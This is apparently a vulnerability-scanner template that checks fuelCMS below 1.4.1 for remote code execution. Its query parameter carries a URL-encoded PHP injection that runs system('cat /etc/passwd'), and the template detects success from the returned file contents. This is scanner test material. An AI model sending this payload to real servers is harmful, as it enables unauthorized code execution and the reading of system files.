id: fuelcms-rce
info:
  name: fuelCMS < 1.4.1 - RCE
  risk: Critical

params:
  - root: "{{.BaseURL}}"

variables:
  - fuel: |
      /
      /fuel/

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}{{.fuel}}pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27cat%20/etc/passwd%27%29%2b%27
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
      - Accept: text/plain, */*; q=0.01
      - Content-Type: application/json
      - X-Requested-With: XMLHttpRequest
      - Referer: "{{.URL}}"
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", ":/bin/bash")
